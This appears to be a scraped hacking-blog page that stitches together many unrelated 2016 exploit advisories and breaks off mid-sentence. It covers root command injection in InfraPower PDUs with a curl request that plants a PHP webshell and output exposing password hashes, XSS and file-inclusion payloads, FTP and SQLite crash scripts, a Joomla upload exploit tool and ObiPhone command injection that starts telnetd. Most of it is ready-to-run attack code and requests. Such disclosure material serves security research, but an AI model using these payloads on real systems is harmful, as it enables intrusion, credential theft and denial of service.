InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
27.09.2016
--
#################################################################################
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
#################################################################################
POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php
t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"
somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"
Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--
#################################################################################
POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
#################################################################################
lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------
Scanning recursively...Done.
dball.php:
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
doupgrate.php:
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'
Firmware.php:
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
Function.php:
Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'
FWUpgrade.php:
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
index.php:
Line 2: Header Injection in 'header' via '$_SERVER'
IPSettings.php:
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'
ListFile.php:
Line 12: PHP File Inclusion in 'fgets' via '$fp'
Login.php:
Line 151: Command Injection in 'shell_exec' via '$_POST'
Ntp.php:
Line 46: Command Injection in 'exec' via '$idx'
OutletDetails.php:
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
PDUStatus.php:
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
production_test1.php:
Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'
SensorDetails.php:
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
SensorStatus.php:
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
SNMP.php:
Line 41: Command Injection in 'exec' via '$_POST'
System.php:
Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'
UploadEXE.php:
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
WriteRequest.php:
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.
lqwrm@zslab:~#
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863105950
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. The vulnerability exist due to several POST
parameters in several scripts not being sanitized when using the exec(),
proc_open(), popen() and shell_exec() PHP function while updating the
settings on the affected device. This allows the attacker to execute
arbitrary system commands as the root user and bypass access controls in
place.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
27.09.2016
--
doupgrate.php:
--------------
09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>
---------------------------------------------------------------------
IPSettings.php:
---------------
83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //移除前後空白
166: //格式錯誤
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //內容檢查
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
176: return $ipstring;
177: }
---------------------------------------------------------------------
Login.php:
----------
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }
---------------------------------------------------------------------
Ntp.php:
--------
36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>
---------------------------------------------------------------------
production_test1.php:
---------------------
4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }
---------------------------------------------------------------------
SNMP.php:
---------
34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }
---------------------------------------------------------------------
System.php:
-----------
86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //移除前後空白
338: //格式錯誤
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //內容檢查
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
349: return $ipstring;
350: }
---------------------------------------------------------------------
UploadEXE.php:
--------------
72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
---------------------------------------------------------------------
---------------------------------------------------------------------
---------------------------------------------------------------------
#1
--
PoC Request:
curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'
...
curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
Response:
root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
#2
--
PoC Request:
POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
Response:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751
verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
#!/usr/bin/python
### Baby FTP 1.24 - Denial of Service by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script and write the IP to attack.
# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time
# Exploit code
# ============
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,21)))
print "[+] Connection %d" % i
crash1 = "A"*500
sarr[i].send("USER anonymous\r\n" )
sarr[i].recv(4096)
sarr[i].send("PASS n30m1nd\r\n" )
sarr[i].recv(4096)
i+=1
except socket.error:
print "[*] Server crashed!!"
raw_input()
break
Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
Usage
Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!:
::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: ::
: ::: : : : : : : : : : : : : : : : : : :::
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip
#!/usr/bin/python
# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
# Date: 27/10/1016
# Exploit Author: Peter Baris
# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
# Version: 1.0.0
# Tested on: windows 7 and XP SP3
# Longer strings will cause heap based overflow
# usage: python usqlite.py <host address>
# Output in the debugger
# EAX 0000038C
# ECX 00B0DA10
# EDX 0000038C
# EBX 41414141
# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# EBP 41414141
# ESI 41414141
# EDI 41414141
# EIP 42424242 <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
###############################################################################################################################################
import socket
import sys
if len(sys.argv)<=1:
print("Usage: python usqlite.py hostname")
sys.exit()
hostname=sys.argv[1]
port = 3002
buffer = "A"*259+"B"*4+"C"*360
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((hostname,port))
sock.send(buffer +'\r\n')
sock.recv(1024)
sock.close()
# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
import os
evil = '\x90'
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()
# Exploit Title: ATKGFNEXSrv ATKGFNEX- Privilege Escalation Unquoted Service Path vulnerability
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 1.0.11.1
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ATKGFNEXSrv (GFNEXSrv.exe)' deployed as part of ATKGFNEX
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
POC :
C:\Users\Utilisateur>sc qc "ATKGFNEXSrv"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ATKGFNEXSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
LOAD_ORDER_GROUP : ShellSvcGroup
TAG : 0
DISPLAY_NAME : ATKGFNEX Service
DEPENDENCIES : ASMMAP64
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
Airmail is a popular email client on iOS and OS X.
I found a vulnerability in airmail of the latest version which could cause
a file:// xss and arbitrary file read.
Author: redrain, yu.hong@chaitin.com
Date: 2016-08-15
Version: 3.0.2 and earlier
Platform: OS X and iOS
Site: http://airmailapp.com/
Vendor: http://airmailapp.com/
Vendor Notified: 2016-08-15
Vulnerability:
There is a file:// xss in airmail version 3.0.2 and earlier.
The app can deal the URLscheme render with link detection, any user can
edit the email content in reply with the evil code with the TL;DR.
Airmail implements its user interface using an embedded version of WebKit,
furthermore Airmail on OS X will render any URI as a clickable HTML <a
href= link. An attacker can create a simple JavaScript URI (e.g.,
javascript:) which when clicked grants the attacker initial JavaScript
execution (XSS) in the context of the application DOM.
PoC:
javascript://www.baidu.com/research?%0Aprompt(1)
a
Arbitrary file read:
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
public $obj;
function __clone()
{
$this->obj = clone $this;
return $this->obj;
}
}
$obj = new MyCloneableClass();
$obj2 = clone $obj;
?>
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
# Exploit Title: Gnome Eye of Gnome Out-of-bounds-write
# Exploit Author: Kaslov Dmitri
# Vendor Homepage: https://wiki.gnome.org/Apps/EyeOfGnome
# Version: 3.10.2
# Tested on: Ubuntu 14.04 LTS
# CVE: CVE-2016-6855
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40291.zip
Reported: 19-August-2016
Fixed: 21-Agugst-2016 (fix will go into next software release)
GMarkup requires valid UTF8 input strings and would cause odd
looking messages if given invalid input. This could also trigger an
out-of-bounds write in glib before 2.44.1
ObiHai ObiPhone - Multiple Vulnerabilities
------------------------------------------
Introduction
============
Multiple vulnerabilities were discovered in the web management
interface of the ObiHai ObiPhone products. The Vulnerabilities were
discovered during a black box security assessment and therefore the
vulnerability list should not be considered exhaustive.
Affected Devices and Versions
=============================
ObiPhone 1032/1062 with firmware less than 5-0-0-3497.
Vulnerability Overview
======================
Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length
Vulnerability Details
=====================
----------------------------------------------------------------------------
Obi-1. Memory corruption leading to free() of an attacker-controlled address
----------------------------------------------------------------------------
By providing a long URI (longer than 256 bytes) not containing a slash in a
request, a pointer is overwritten which is later passed to free(). By
controlling the location of the pointer, this would allow an attacker to affect
control flow and gain control of the application. Note that the free() seems to
occur during cleanup of the request, as a 404 is returned to the user before the
segmentation fault.
python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479d8b18 in free () from root/lib/libc.so.6
#1 0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>: ldr r3, [r0, #-4]
0x479d8b1c <free+52>: sub r5, r0, #8
0x479d8b20 <free+56>: tst r3, #2
0x479d8b24 <free+60>: bne 0x479d8bec <free+260>
0x479d8b28 <free+64>: tst r3, #4
(gdb) i r r0
r0 0x41 65
---------------------------------------
Obi-2. Command injection in WiFi Config
---------------------------------------
An authenticated user (including the lower-privileged "user" user) can enter a
hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet
daemon.
GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]
Note that telnetd is now running and accessible via user "root" with no
password.
-----------------------------------------------
Obi-3. Denial of Service due to buffer overflow
-----------------------------------------------
By providing a long URI (longer than 256 bytes) beginning with a slash, memory
is overwritten beyond the end of mapped memory, leading to a crash. Though no
exploitable behavior was observed, it is believed that memory containing
information relevant to the request or control flow is likely overwritten in the
process. strcpy() appears to write past the end of the stack for the current
